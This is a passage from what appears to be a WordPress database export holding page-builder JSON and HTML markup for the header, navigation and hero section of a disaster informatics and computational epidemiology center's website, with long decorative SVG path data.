2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}},{\"name\":\"hop-button\",\"parentId\":\"22-h29\",\"id\":\"22-h39\",\"partialId\":22,\"styleRef\":679,\"type\":\"header\",\"props\":{\"text\":\"Learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}}}],\"parentId\":\"22-h26\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',23,'https://gsudice.dataconn.net/?p=1312',0,'revision','',0),(1313,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path 